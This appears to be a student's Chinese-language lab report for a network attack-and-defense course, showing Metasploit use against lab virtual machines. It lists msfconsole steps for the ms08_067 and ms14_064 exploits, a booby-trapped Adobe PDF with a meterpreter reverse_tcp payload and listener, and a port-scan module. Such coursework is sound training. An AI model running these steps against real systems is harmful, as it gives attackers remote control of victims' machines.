• 2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用


    2019-2020-2 20175312 陶光远《网络对抗技术》 Exp6 MSF基础应用

    一、实验目标与内容

    1.实践目标

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

    2.实践内容

    (1)一个主动攻击实践,如ms08_067;
    (2)一个针对浏览器的攻击,如ms11_050;
    (3)一个针对客户端的攻击,如Adobe;
    (4)成功应用任何一个辅助模块。

    二、实践步骤

    1、一个主动攻击实践

    1-1、简介

    ms08_067_netapi
    攻击机:kali(192.168.137.128)
    靶机:Windows Server 2003(192.168.137.148)

    1-2、操作

    启动msfconsole查找漏洞search ms08-067:

    use exploit/windows/smb/ms08_067_netapi选择该漏洞:

    选取payload并设置参数:

    输入exploit进行攻击

    2、一个针对浏览器的攻击

    2-1、简介

    ms14-064
    攻击机:kali(192.168.137.128)
    靶机:Windows XP(192.168.137.149)

    2-2、操作

    用search ms14-064查询一下针对该漏洞的攻击模块

    use exploit/windows/browser/ms14_064_ole_code_execution使用该模块:
    用set payload windows/meterpreter/reverse_tcp设置payload
    show options查看信息,并设置需要设置的参数。

    exploit攻击后会生成带有攻击性的URL,如图:

    在winxp上用ie浏览器打开:

    再回到kali 发现已经回连成功:

    3、一个针对客户端的攻击

    3-1、简介

    攻击机:kali(192.168.137.128)
    靶机:Windows XP(192.168.137.149)

    3-2、操作

    msfconsole
    use windows/fileformat/adobe_cooltype_sing //选择攻击模块
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.137.128 //攻击机 IP
    set LPORT 5312
    set FILENAME zlx5312.pdf //设置生成的pdf文件名

    exploit //发起攻击
    生成zlx5312.pdf,装有虚拟增强功能的虚拟机可以直接复制至靶机上

    控制台中输入back退出当前模块,输入以下命令进入监听模块:
    use exploit/multi/handler //进入监听模块
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.186.128 //攻击机 IP
    set LPORT 5313
    exploit
    靶机中打开zlx5313.pdf文件,
    kali中发现回连成功:

    4、成功应用任何一个辅助模块

    4-1、简介

    攻击机:kali(192.168.137.128)
    靶机:Windows XP(192.168.137.149)

    4-2、操作

    search portscan # 搜索端口相关的漏洞

    use auxiliary/scanner/portscan/ack # 使用漏洞
    show options #显示设置
    设置参数,并进行扫描:

    三、实验中遇到的问题

    问题:输入exploit/run/其他操作后,无反应/运行失败。
    (1)如下图,这是由于虚拟机所用系统版本造成的,把中文版换英文版后就可以进行了。

    (2)如下图,未知原因就是攻击不成功,多次重试后攻击成功。

    (3)如下图,设置参数进行扫描毫无反应,没有任何回馈,未知解决方案

    四、问题回答

    (1)用自己的话解释什么是exploit,payload,encode.
    exploit:利用系统、程序或服务的漏洞对靶机攻击的过程。
    payload:有效载荷,是攻击方想要执行的代码
    encode:对恶意代码进行伪装,使其不被靶机发现,从而达到攻击的目的。
    (2)离实战还缺些什么技术或步骤?
    一缺信息来源,这主要表现在信息收集渠道上,实战中靶机的各种信息需要我们自行获取,不可能像实验中这样,干脆是自己安装的。
    二缺操作方式,连英文中文版本的差异都会造成某些漏洞攻击无法生效,更别说操作系统代代更新,我们会用的未必是靶机会被成功攻击的。

    五、实验收获与感想

    本次实验在流程上可以说非常简单,操作上没有太大难度。
    实验中出现的问题,无论是否解决我都可以预料到是虚拟机/电脑的问题而不是操作的失误,之前实验中有时会遇到一些无法理解的知识点,本次实验却几乎没有遇到,这次实验可以说是一个实践的过程,按照课程内容完成即可。
    我在此次实验中掌握metasploit的基本应用方式,理解了重点常用的三种攻击方式的思路,复习了相关课程内容,收益匪浅。
  • 相关阅读:
    [轉]Linux kernel <2.6.29 exit_notify() local root exploit分析(2009-1337)
    [轉]udp_sendmsg空指针漏洞分析 by wzt
    linux 中mmap的用法
    [轉]Exploit The Linux Kernel NULL Pointer Dereference
    [轉]Exploit Linux Kernel Slub Overflow
    Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)
    字符串哈希专题
    树形DP
    ACM中的正则表达式
    回文树学习笔记
  • 原文地址:https://www.cnblogs.com/20175312-tgy/p/12811210.html
Copyright © 2020-2023  润新知